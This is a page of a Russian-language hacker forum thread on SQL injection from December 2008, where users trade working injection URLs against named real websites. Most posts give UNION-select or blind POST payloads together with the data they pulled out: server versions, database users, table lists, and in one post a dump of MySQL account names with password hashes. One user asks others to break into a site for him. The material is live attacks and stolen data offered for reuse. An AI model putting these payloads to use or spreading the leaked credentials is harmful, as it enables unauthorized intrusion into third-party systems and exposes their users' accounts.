ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 702 из 1242 « Первая < 202602652692 698 699 700 701 702 703 704 705 706 7127528021202 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7011  
Старый 05.12.2008, 23:31
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию
http://www.choice s.edu/resources/detail.php?id=-26+union+select+1,unhex(hex(version())),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28--

4.1.14-log

http://www.fis k.edu/page.asp?id=158+and+1=-1+union+select+1,@@version--

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: )

http://www.cese.utulsa.edu/content.jsp?id=-17+union+select+1,database(),3--
Последний раз редактировалось plutus; 06.12.2008 в 00:02..
 
Ответить с цитированием

  #7012  
Старый 06.12.2008, 01:00
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию
Помогите раскрутить http://db.zenyro.ru/items/potions/detail/575l.htm'
 
Ответить с цитированием

  #7013  
Старый 06.12.2008, 02:43
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
Цитата:
Сообщение от BanQui  
Помогите раскрутить http://db.zenyro.ru/items/potions/detail/575l.htm'
Крутить данную бестолку, т.к. ничего интересного этот запрос не представляет. Есть более удобный файл с ПОСТ запросом. Времяни на это у меня нет, но скажу по секрету, что версия Мускула там 5ая, а это значит есть information_schema. Для работы лучше используй тулзу на PHP из этой темы https://forum.antichat.ru/thread19844.html (нижний пост).


POST http://ТОТСАЙТ.ru/mob_search.html HTTP/1.0
Host: ТОТСАЙТ.ru


filter[mod_name]=mob_search&filter[name]=Fabre%'+AND+SUBSTRING((SELECT+version()+FROM+ragn adb.mob_db+LIMIT+0,1),1,1)=5#

Вот о чем я примерно.
 
Ответить с цитированием

  #7014  
Старый 06.12.2008, 02:50
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Твой запрос не фурычит,или мой моск не фурычит))
 
Ответить с цитированием

  #7015  
Старый 06.12.2008, 03:04
Аватар для cash$$$
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию
Цитата:
http://www.audit.kharkov.com/news.php?id=99999+union+select+1,2,version(),user( ),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20/*
version: 5.0.41-community
user: gkcomua_global@localhost
database: gkcomua_global

Таблицы:

Код:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
articles
autors
autors_info
comments
session
activities
cities
config
countries
currencies
formoflaw
pictures
purchase
sale
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
baza
dop_inf
doska
fen_category
Обратите внимание на это

форум => группы => просмотреть информацию

ссылка: http://www.audit.kharkov.com/forum1/groupcp.php?g=22&sid=ae20327f81b80ed5fd34b4bbc3715 4a8

Цитата:
http://www.diotravel.ru/index.php?id=99999+union+select+1,2,3,4,5,version( )/*
version: 4.1.22-log
user: diotrav2_dio@localhost
database: diotrav2_dio
Последний раз редактировалось cash$$$; 06.12.2008 в 03:06..
 
Ответить с цитированием

  #7016  
Старый 06.12.2008, 03:32
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию
http://cdbara n.com/detail.php?id=-241+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+information_schema.tables--

version 5
 
Ответить с цитированием

  #7017  
Старый 06.12.2008, 06:08
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
http://teknews.net/details.php?id=-41839+union+select+1,2,version(),database(),5,user (),7,8,9--

Version: 5.0.51a-3ubuntu5.4
user: teknews@localhost
database: teknews

http://www.online-publishers.org/newsletter.php?newsId=164+union+select+1,2,version (),user(),5,6,7,8,9,database(),11,12,13,14,15,16,1 7,18,19,20,21,22,23/*

version: 4.1.20
user: opaadmin@localhost
database: OPA

http://www.nepaltravelnews.com/news.php?nid=207+union+select+1,2,3,version(),user (),database(),7,8,9,10,11,12,13,14--&&page=nid

version: 5.0.51a-community
user: travel_ntn@localhost
database: travel_travel

http://www.insanely-great.com/news.php?id=-9905+union+select+1,2,user(),version(),5,6,databas e(),8,9,10,11,12,13,14,15,16,17,18/*

version: 4.1.21-log
user: flamini_flaminio@216.14.208.109
database: flamini_igm
 
Ответить с цитированием

  #7018  
Старый 06.12.2008, 14:26
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию
Цитата:
Сообщение от max_pain89  
Крутить данную бестолку, т.к. ничего интересного этот запрос не представляет. Есть более удобный файл с ПОСТ запросом. Времяни на это у меня нет, но скажу по секрету, что версия Мускула там 5ая, а это значит есть information_schema. Для работы лучше используй тулзу на PHP из этой темы https://forum.antichat.ru/thread19844.html (нижний пост).


POST http://ТОТСАЙТ.ru/mob_search.html HTTP/1.0
Host: ТОТСАЙТ.ru


filter[mod_name]=mob_search&filter[name]=Fabre%'+AND+SUBSTRING((SELECT+version()+FROM+ragn adb.mob_db+LIMIT+0,1),1,1)=5#

Вот о чем я примерно.
Слу пожалуйста покрути её немного! Я блин тама в этом скульном скрипте все заполнил, вроде прально а он мне пишет:
Невозможно провести sql инъекцию, возможно:
1. Данные введены не правильно
2. Передача данных выбранным методом невозможна для данного сайта
Плиизззз покрути ето! МНЕ ОЧЕНЬ НУЖНО!!!!
 
Ответить с цитированием

:(
  #7019  
Старый 06.12.2008, 16:55
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
Wink :(
http://www.gryphon.org.au/gallery/pictures/showPicture.php?album=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--
5.0.67:gryphon@localhost:gryphon
http://www.gryphon.org.au/gallery/pictures/showPicture.php?album=-1+union+select+1,concat_ws(0x3a,user,password)+fro m+mysql.user--
PHP код:
root:*A0BA0CCDEF2E7FAEF16510E7F845108919D1D778    phpmyadmin:*45988B8EBD97ABF91FE3ADFEFA92BE3FBA859CA0    
debian-sys-maint:5628c5d468086ccb
mysql:652f9c175d1914f9
gryphon:2314d08b327c439a
xrms:420fe7a60860988c
nuke:7947670723f0a05b
primequalitymeat:3d6a72ce055ea240
anta:2210636e65fe3992
bytesys:0e091d0759fdd203
autism:0a53f5a70675ac01
backup:*A11C33EBF4C6044E919113E6BC70408DA6A665CE
zubah:2e77180b427b3418
carl:*CEEBD0B5C31056DC20AB5E97EC94EE8F5AB70C12
sugarcrm:110832a12c60f2c7
sugarcrm:*2444EE85885C0FA09B328E49FDD203B0E508BE38
ajexa:7726ea7663fab356    
ajexa:*CB1645B337E2753340EA7B99D6F88509B55D03DE    
....
etc 
http://www.vibb.at/gallery/showpicture.php?id=-1+union+select+1,2,3,4,5+from+users/*
no printable

http://www.soostheglobe.nl/albums/showpicture.php?albumid=61&photo=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3--
4.1.20-logays@localhost:soos

http://www.bertemu.us/showpicture.php?pic=21241+union+select+1,concat_ws (0x3a,version(),user(),database())/*
4.1.22-standard:bertemu_remko@localhost:bertemu_bertemu

http://rybalka.zooclub.ru/article.php?id=999999+union+select+1,concat_ws(0x3 a,user(),database(),version()),3--
user():zooclub_zooclub@localhost
database():zooclub_rybalka
version():5.0.67-community-log


http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),d atabase(),version()),8,9,10/*

user()ollan_article@localhost
database()ollan_articles
version():4.1.22-standard

http://www.tnufacenter.com/rus/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,us
er(),database(),version()),5/*
user()fer@localhost
database():tnufacenter
version():5.0.22-community-nt

http://www.energovent.com/ru/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version())/*
user():dbu_dolbik_1@192.168.5.56
database():db_dolbik_5
version():4.1.22-log

http://ve.free-travels.ru/books/item.php?id=9999999+union+select+1,2,3,4,5,6,7,8,9 ,10
,11,concat_ws(0x3a,user(),database(),version()),13 ,14,15/*

user():gb_x_free_9e1@81.176.226.194
database():gb_x_free_9e1
version():5.0.45-community-nt-log

http://sistem.by/main.php?catid=-1+union+select+concat_ws(0x3a,user(),database(),ve rs
ion())/*
user():sysby@localhost
database():sysby
vaersion():5.0.41

http://www.sokol-mebel.ru/dressers/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(
0x3a,user(),database(),version()),8,9--
user():u97809@10.10.223.241
database():u97809
version():5.0.67-log

http://www.garo.cc/text.php?pageid=999999+union+select+1,2,3,concat_w s(0x3a,user(),database(),version()),5,6,7,8,9--
user():u7114@10.10.153.191
database():u7114
version():5.0.67-log

http://www.zvi.ru/item.php?id=999999999+union+select+1,2,concat_ws(0 x3a,user(),database(),version()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,
29,30,31--
user():szvi@localhost
database():shop2
version():5.0.26
Последний раз редактировалось S00pY; 06.12.2008 в 20:18.. Причина: :()
 
Ответить с цитированием

  #7020  
Старый 06.12.2008, 18:56
Аватар для a.su.s
a.su.s
Познающий
Регистрация: 02.03.2008
Сообщений: 44
Провел на форуме:
366195

Репутация: 64
По умолчанию
www.azffc.org PR=5

Код:
http://www.azffc.org/show_page.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21,22--
Version() - 5.0.45-log

Таблицы:
Код:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
articles
attachments
cases
config
content
homepage
images
images_pages
ips
lawyers
news
pages
questions
random_image
registrations
trivia
crnc.org PR=6

Код:
http://www.crnc.org/viewnews.php?id=-1+union+select+1,version(),user(),4,5,6,7--
Version() - 5.0.51a-log

Таблицы:
Код:
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
activity
admin
articles
images
members
page_contents
states
 
Ответить с цитированием
Ответ
Страница 702 из 1242 « Первая < 202602652692 698 699 700 701 702 703 704 705 706 7127528021202 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ